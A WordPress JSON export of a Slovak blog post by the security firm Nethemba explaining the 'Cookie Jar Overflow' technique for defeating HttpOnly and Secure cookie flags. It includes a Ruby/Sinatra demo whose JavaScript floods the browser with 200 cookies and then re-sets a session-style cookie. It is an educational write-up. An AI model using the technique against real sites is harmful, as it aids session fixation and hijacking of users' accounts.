{"id":1512,"date":"2014-09-27T02:02:35","date_gmt":"2014-09-27T02:02:35","guid":{"rendered":"http:\/\/nethemba.com\/de\/cookie-jar-overflow\/"},"modified":"2014-09-27T02:02:35","modified_gmt":"2014-09-27T02:02:35","slug":"cookie-jar-overflow","status":"publish","type":"post","link":"https:\/\/nethemba.com\/de\/cookie-jar-overflow\/","title":{"rendered":"Cookie Jar Overflow"},"content":{"rendered":"<p id=\"yui_patched_v3_11_0_1_1411842581418_466\">HttpOnly pr\u00edznak pri cookies zabra\u0148uje, aby sa pomocou Javascriptu dala ich hodnota na\u010d\u00edta\u0165 alebom meni\u0165. Je jedn\u00fdm z opatren\u00ed, ktor\u00e9 sl\u00fa\u017ei ako prevencia proti \u010fal\u0161\u00edm \u00fatokom, napr\u00edklad kradnutie session v spojeni so &#8222;Session Fixation&#8220; (viac na <a href=\"https:\/\/www.owasp.org\/index.php\/Session_fixation\">https:\/\/www.owasp.org\/index.php\/Session_fixation<\/a>).<\/p>\n<p>Predpokladajme, \u017ee aplik\u00e1cia zranite\u013en\u00e1 na &#8222;Session Fixation&#8220; nastav\u00ed HttpOnly pr\u00edznak pre session cookie.<\/p>\n<p>\u00dato\u010dn\u00edk v be\u017en\u00fdch pr\u00edpadoch <strong>nedok\u00e1\u017ee<\/strong> spravi\u0165 nasledovn\u00e9:<\/p>\n<ol>\n<li>Prist\u00fapi\u0165 ku cookie, zmeni\u0165 jej hodnotu<\/li>\n<li>Po\u010dkat, a\u017e sa pou\u017e\u00edvate\u013e op\u00e4tovne prihl\u00e1si<\/li>\n<li>Nastavi\u0165 si u\u017e pre neho zn\u00e1mu hodnotu cookie u seba a z\u00edska\u0165 t\u00fdm pr\u00edstup k jeho session<\/li>\n<\/ol>\n<p id=\"yui_patched_v3_11_0_1_1411841543755_492\">Problematick\u00fd je prv\u00fd bod, v pr\u00edpade, \u017ee by sme napr\u00edklad na\u0161li zranitelnos\u0165 typu XSS, dok\u00e1zali by sme <strong id=\"yui_patched_v3_11_0_1_1411842793291_690\">vytvori\u0165 in\u00e9 cookies bez HttpOnly pr\u00edznaku<\/strong> (ktor\u00fd by Javascript tie\u017e nemal umo\u017eni\u0165 ani nastavi\u0165). Tento fakt n\u00e1m o chv\u00ed\u013eu pom\u00f4\u017ee.<\/p>\n<p id=\"yui_patched_v3_11_0_1_1411842581418_553\">V minulosti sa u\u017e objavilo nieko\u013eko \u00fatokov, ako prist\u00fapi\u0165 cez Javascript k<br \/>\nHttpOnly cookies, napr\u00edklad <a href=\"http:\/\/www.cvedetails.com\/cve\/CVE-2012-0053\/\">CVE-2012-0053<\/a> pre niektor\u00e9 verzie webov\u00e9ho servera Apache.<\/p>\n<p id=\"yui_patched_v3_11_0_1_1411842581418_584\">Jedna z celkom elegantn\u00fdch technik, ktor\u00fa ju aktu\u00e1lne mo\u017en\u00e9 pou\u017ei\u0165 pri v\u00e4\u010d\u0161ine prehliada\u010dov v poslednej verzii (testovan\u00fd Firefox 32.0.3, Google Chrome 37.0.2062.124) je &#8222;Cookie Jar Overflow&#8220;.<\/p>\n<p>Webov\u00fd prehliada\u010d si uklad\u00e1 pre konkr\u00e9tne dom\u00e9ny v r\u00e1mci Same Origin Policy (SOP) len ist\u00fd po\u010det cookies a pokia\u013e ich dok\u00e1\u017ee \u00fato\u010dn\u00edk vygenerova\u0165 dostato\u010dn\u00e9 mno\u017estvo, tie p\u00f4vodne &#8222;vypadn\u00fa&#8220; a m\u00f4\u017ee ich e\u0161te raz vytvori\u0165, tentokr\u00e1t bez HttpOnly pr\u00edznaku. Kv\u00f4li SOP obmedzeniu je nutn\u00e9 str\u00e1nku na\u010d\u00edta\u0165 v r\u00e1mci rovnakej &#8222;document.domain&#8220; (\u010do vo v\u00e4\u010dsine pr\u00edpadov znamen\u00e1 n\u00e1js\u0165 \u010fal\u0161iu XSS zranite\u013enos\u0165).<\/p>\n<p>\u00datok bol demon\u0161trovan\u00fd v knihe <a href=\"http:\/\/www.amazon.com\/Browser-Hackers-Handbook-Wade-Alcorn\/dp\/1118662091\">The Browser Hacker&#8217;s Handbook<\/a>. Ni\u017e\u0161ie uv\u00e1dzam k\u00f3d v takmer nezmenenej forme, funguje nasledovne:<\/p>\n<ul>\n<li>Po na\u010d\u00edtan\u00ed str\u00e1nky sa nastav\u00ed cookie &#8222;link_url&#8220; na hodnotu http:\/\/www.google.com, s nastaven\u00fdm HttpOnly<\/li>\n<li>Sk\u00fasime zmeni\u0165 hodnotu cookie na &#8222;https:\/\/nethemba.com&#8220; (kliknut\u00edm na Attempt Change), po reloade str\u00e1nky zist\u00edme, \u017ee sa ni\u010d nestalo (HttpOnly)<\/li>\n<li>Kliknut\u00edm na Spam Cookies vygenerujeme nieko\u013eko \u010fal\u0161\u00edch cookies s n\u00e1zvom test_COOKIE&lt;id&gt;, \u010d\u00edm na\u0161a cookie &#8222;vypadne&#8220; z Cookie Jar<\/li>\n<li>Vygenerujeme si nov\u00fa cookie s rovnak\u00fdm n\u00e1zvom (link_url), ale bez bezpe\u010dnostn\u00fdch pr\u00edznakov<\/li>\n<\/ul>\n<p id=\"yui_patched_v3_11_0_1_1411842581418_620\"><code id=\"yui_patched_v3_11_0_1_1411842581418_619\">require 'rubygems'<br \/>\nrequire 'thin'<br \/>\nrequire 'rack'<br \/>\nrequire 'sinatra'<br \/>\nrequire 'json'<\/code><\/p>\n<p><code>class CookieDemo &lt; Sinatra::Base<br \/>\nget \"\/\" do<br \/>\nlink_url = \"http:\/\/www.google.com\"<br \/>\nif !request.cookies['link_url'] then<br \/>\nresponse.set_cookie \"link_url\", {:value =&gt; link_url, :httponly =&gt; true}<br \/>\nelse<br \/>\nlink_url = request.cookies['link_url']<br \/>\nend<br \/>\n'&lt;A HREF=\"' + link_url + '\"&gt;Secret Login Page&lt;\/A&gt;<br \/>\n&lt;script&gt;<br \/>\nfunction setCookie()<br \/>\n{<br \/>\ndocument.cookie = \"link_url=https:\/\/nethemba.com\";<br \/>\nalert(\"Single cookie sent\");<br \/>\n}<br \/>\nfunction setCookies()<br \/>\n{<br \/>\nvar i = 0;<br \/>\nwhile (i &lt; 200)<br \/>\n{<br \/>\nkname = \"test_COOKIE\" + i;<br \/>\ndocument.cookie = kname + \"=test\";<br \/>\ni = i + 1;<br \/>\n}<br \/>\ndocument.cookie = \"link_url=https:\/\/nethemba.com\";<br \/>\nalert(\"Overflow Executed\");<br \/>\n}<br \/>\n&lt;\/script&gt;<br \/>\n&lt;BR&gt;<br \/>\n&lt;input type=button value=\"Attempt Change\" onclick=\"setCookie()\"&gt;&lt;BR&gt;<br \/>\n&lt;input type=button value=\"Spam Cookies\" onclick=\"setCookies()\"&gt;<br \/>\n'<\/code><\/p>\n<p><code>\u00a0 end<br \/>\nend<\/code><\/p>\n<p><code>@routes = {<br \/>\n\"\/\" =&gt; CookieDemo.new<br \/>\n}<\/code><\/p>\n<p><code>@rack_app = Rack::URLMap.new(@routes)<br \/>\n@thin = Thin::Server.new(\"nethemba.com\", 4000, @rack_app)<\/code><\/p>\n<p><code>Thin::Logging.silent = true<br \/>\nThin::Logging.debug = false<\/code><\/p>\n<p><code>puts \"[#{Time.now}] Thin ready\"<br \/>\n@thin.start<\/code><\/p>\n<p>Realizovan\u00edm \u00fatoku sa navy\u0161e zbav\u00edme aj &#8222;Secure&#8220; pr\u00edznaku, ktor\u00fd zaru\u010duje, aby sa cookies nastaven\u00e9 v HTTPS spojen\u00ed nikdy neposielali pomocou protokolu HTTP.<\/p>\n<p><strong>Zdroj:<\/strong><br \/>\n<a href=\"http:\/\/www.amazon.com\/Browser-Hackers-Handbook-Wade-Alcorn\/dp\/1118662091\">Wade Alcorn, Christian Frichot, Michele Orru: The Browser Hacker&#8217;s Handbook, April 2014<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>HttpOnly pr\u00edznak pri cookies zabra\u0148uje, aby sa pomocou Javascriptu dala ich hodnota na\u010d\u00edta\u0165 alebom meni\u0165. Je jedn\u00fdm z opatren\u00ed, ktor\u00e9 sl\u00fa\u017ei ako prevencia proti \u010fal\u0161\u00edm \u00fatokom, napr\u00edklad kradnutie session v spojeni so &#8222;Session Fixation&#8220; (viac na https:\/\/www.owasp.org\/index.php\/Session_fixation). Predpokladajme, \u017ee aplik\u00e1cia zranite\u013en\u00e1 na &#8222;Session Fixation&#8220; nastav\u00ed HttpOnly pr\u00edznak pre session cookie. \u00dato\u010dn\u00edk v be\u017en\u00fdch pr\u00edpadoch nedok\u00e1\u017ee [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"inline_featured_image":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[11],"tags":[],"class_list":["post-1512","post","type-post","status-publish","format-standard","hentry","category-unkategorisiert"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.3 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Cookie Jar Overflow - Nethemba<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/nethemba.com\/de\/cookie-jar-overflow\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Cookie Jar Overflow - Nethemba\" \/>\n<meta property=\"og:description\" content=\"HttpOnly pr\u00edznak pri cookies zabra\u0148uje, aby sa pomocou Javascriptu dala ich hodnota na\u010d\u00edta\u0165 alebom meni\u0165. Je jedn\u00fdm z opatren\u00ed, ktor\u00e9 sl\u00fa\u017ei ako prevencia proti \u010fal\u0161\u00edm \u00fatokom, napr\u00edklad kradnutie session v spojeni so &#8222;Session Fixation&#8220; (viac na https:\/\/www.owasp.org\/index.php\/Session_fixation). Predpokladajme, \u017ee aplik\u00e1cia zranite\u013en\u00e1 na &#8222;Session Fixation&#8220; nastav\u00ed HttpOnly pr\u00edznak pre session cookie. \u00dato\u010dn\u00edk v be\u017en\u00fdch pr\u00edpadoch nedok\u00e1\u017ee [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/nethemba.com\/de\/cookie-jar-overflow\/\" \/>\n<meta property=\"og:site_name\" content=\"Nethemba\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/nethemba\" \/>\n<meta property=\"article:published_time\" content=\"2014-09-27T02:02:35+00:00\" \/>\n<meta name=\"author\" content=\"Pavol Lupt\u00e1k\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@nethemba\" \/>\n<meta name=\"twitter:site\" content=\"@nethemba\" \/>\n<meta name=\"twitter:label1\" content=\"Verfasst von\" \/>\n\t<meta name=\"twitter:data1\" content=\"Pavol Lupt\u00e1k\" \/>\n\t<meta name=\"twitter:label2\" content=\"Gesch\u00e4tzte Lesezeit\" \/>\n\t<meta name=\"twitter:data2\" content=\"3\u00a0Minuten\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/nethemba.com\\\/de\\\/cookie-jar-overflow\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/nethemba.com\\\/de\\\/cookie-jar-overflow\\\/\"},\"author\":{\"name\":\"Pavol Lupt\u00e1k\",\"@id\":\"https:\\\/\\\/nethemba.com\\\/de\\\/#\\\/schema\\\/person\\\/5f4ba68c8e1a2013d30e0804245b8234\"},\"headline\":\"Cookie Jar Overflow\",\"datePublished\":\"2014-09-27T02:02:35+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/nethemba.com\\\/de\\\/cookie-jar-overflow\\\/\"},\"wordCount\":459,\"commentCount\":0,\"articleSection\":[\"Unkategorisiert\"],\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/nethemba.com\\\/de\\\/cookie-jar-overflow\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/nethemba.com\\\/de\\\/cookie-jar-overflow\\\/\",\"url\":\"https:\\\/\\\/nethemba.com\\\/de\\\/cookie-jar-overflow\\\/\",\"name\":\"Cookie Jar Overflow - Nethemba\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/nethemba.com\\\/de\\\/#website\"},\"datePublished\":\"2014-09-27T02:02:35+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/nethemba.com\\\/de\\\/#\\\/schema\\\/person\\\/5f4ba68c8e1a2013d30e0804245b8234\"},\"breadcrumb\":{\"@id\":\"https:\\\/\\\/nethemba.com\\\/de\\\/cookie-jar-overflow\\\/#breadcrumb\"},\"inLanguage\":\"de\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/nethemba.com\\\/de\\\/cookie-jar-overflow\\\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/nethemba.com\\\/de\\\/cookie-jar-overflow\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/nethemba.com\\\/de\\\/home-new-2025\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Cookie Jar Overflow\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/nethemba.com\\\/de\\\/#website\",\"url\":\"https:\\\/\\\/nethemba.com\\\/de\\\/\",\"name\":\"Nethemba\",\"description\":\"We care about your security\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/nethemba.com\\\/de\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/nethemba.com\\\/de\\\/#\\\/schema\\\/person\\\/5f4ba68c8e1a2013d30e0804245b8234\",\"name\":\"Pavol Lupt\u00e1k\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"de\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/978b23022518d076eaa243b375d2e0272af4f00dd502ce79cc357276d9bc2495?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/978b23022518d076eaa243b375d2e0272af4f00dd502ce79cc357276d9bc2495?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/978b23022518d076eaa243b375d2e0272af4f00dd502ce79cc357276d9bc2495?s=96&d=mm&r=g\",\"caption\":\"Pavol Lupt\u00e1k\"},\"sameAs\":[\"https:\\\/\\\/www.nethemba.com\\\/\"],\"url\":\"https:\\\/\\\/nethemba.com\\\/de\\\/author\\\/nethemba-admin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Cookie Jar Overflow - Nethemba","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/nethemba.com\/de\/cookie-jar-overflow\/","og_locale":"de_DE","og_type":"article","og_title":"Cookie Jar Overflow - Nethemba","og_description":"HttpOnly pr\u00edznak pri cookies zabra\u0148uje, aby sa pomocou Javascriptu dala ich hodnota na\u010d\u00edta\u0165 alebom meni\u0165. Je jedn\u00fdm z opatren\u00ed, ktor\u00e9 sl\u00fa\u017ei ako prevencia proti \u010fal\u0161\u00edm \u00fatokom, napr\u00edklad kradnutie session v spojeni so &#8222;Session Fixation&#8220; (viac na https:\/\/www.owasp.org\/index.php\/Session_fixation). Predpokladajme, \u017ee aplik\u00e1cia zranite\u013en\u00e1 na &#8222;Session Fixation&#8220; nastav\u00ed HttpOnly pr\u00edznak pre session cookie. \u00dato\u010dn\u00edk v be\u017en\u00fdch pr\u00edpadoch nedok\u00e1\u017ee [&hellip;]","og_url":"https:\/\/nethemba.com\/de\/cookie-jar-overflow\/","og_site_name":"Nethemba","article_publisher":"https:\/\/www.facebook.com\/nethemba","article_published_time":"2014-09-27T02:02:35+00:00","author":"Pavol Lupt\u00e1k","twitter_card":"summary_large_image","twitter_creator":"@nethemba","twitter_site":"@nethemba","twitter_misc":{"Verfasst von":"Pavol Lupt\u00e1k","Gesch\u00e4tzte Lesezeit":"3\u00a0Minuten"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/nethemba.com\/de\/cookie-jar-overflow\/#article","isPartOf":{"@id":"https:\/\/nethemba.com\/de\/cookie-jar-overflow\/"},"author":{"name":"Pavol Lupt\u00e1k","@id":"https:\/\/nethemba.com\/de\/#\/schema\/person\/5f4ba68c8e1a2013d30e0804245b8234"},"headline":"Cookie Jar Overflow","datePublished":"2014-09-27T02:02:35+00:00","mainEntityOfPage":{"@id":"https:\/\/nethemba.com\/de\/cookie-jar-overflow\/"},"wordCount":459,"commentCount":0,"articleSection":["Unkategorisiert"],"inLanguage":"de","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/nethemba.com\/de\/cookie-jar-overflow\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/nethemba.com\/de\/cookie-jar-overflow\/","url":"https:\/\/nethemba.com\/de\/cookie-jar-overflow\/","name":"Cookie Jar Overflow - Nethemba","isPartOf":{"@id":"https:\/\/nethemba.com\/de\/#website"},"datePublished":"2014-09-27T02:02:35+00:00","author":{"@id":"https:\/\/nethemba.com\/de\/#\/schema\/person\/5f4ba68c8e1a2013d30e0804245b8234"},"breadcrumb":{"@id":"https:\/\/nethemba.com\/de\/cookie-jar-overflow\/#breadcrumb"},"inLanguage":"de","potentialAction":[{"@type":"ReadAction","target":["https:\/\/nethemba.com\/de\/cookie-jar-overflow\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/nethemba.com\/de\/cookie-jar-overflow\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/nethemba.com\/de\/home-new-2025\/"},{"@type":"ListItem","position":2,"name":"Cookie Jar Overflow"}]},{"@type":"WebSite","@id":"https:\/\/nethemba.com\/de\/#website","url":"https:\/\/nethemba.com\/de\/","name":"Nethemba","description":"We care about your security","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/nethemba.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de"},{"@type":"Person","@id":"https:\/\/nethemba.com\/de\/#\/schema\/person\/5f4ba68c8e1a2013d30e0804245b8234","name":"Pavol Lupt\u00e1k","image":{"@type":"ImageObject","inLanguage":"de","@id":"https:\/\/secure.gravatar.com\/avatar\/978b23022518d076eaa243b375d2e0272af4f00dd502ce79cc357276d9bc2495?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/978b23022518d076eaa243b375d2e0272af4f00dd502ce79cc357276d9bc2495?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/978b23022518d076eaa243b375d2e0272af4f00dd502ce79cc357276d9bc2495?s=96&d=mm&r=g","caption":"Pavol Lupt\u00e1k"},"sameAs":["https:\/\/www.nethemba.com\/"],"url":"https:\/\/nethemba.com\/de\/author\/nethemba-admin\/"}]}},"_links":{"self":[{"href":"https:\/\/nethemba.com\/de\/wp-json\/wp\/v2\/posts\/1512","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nethemba.com\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nethemba.com\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nethemba.com\/de\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/nethemba.com\/de\/wp-json\/wp\/v2\/comments?post=1512"}],"version-history":[{"count":0,"href":"https:\/\/nethemba.com\/de\/wp-json\/wp\/v2\/posts\/1512\/revisions"}],"wp:attachment":[{"href":"https:\/\/nethemba.com\/de\/wp-json\/wp\/v2\/media?parent=1512"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nethemba.com\/de\/wp-json\/wp\/v2\/categories?post=1512"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nethemba.com\/de\/wp-json\/wp\/v2\/tags?post=1512"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}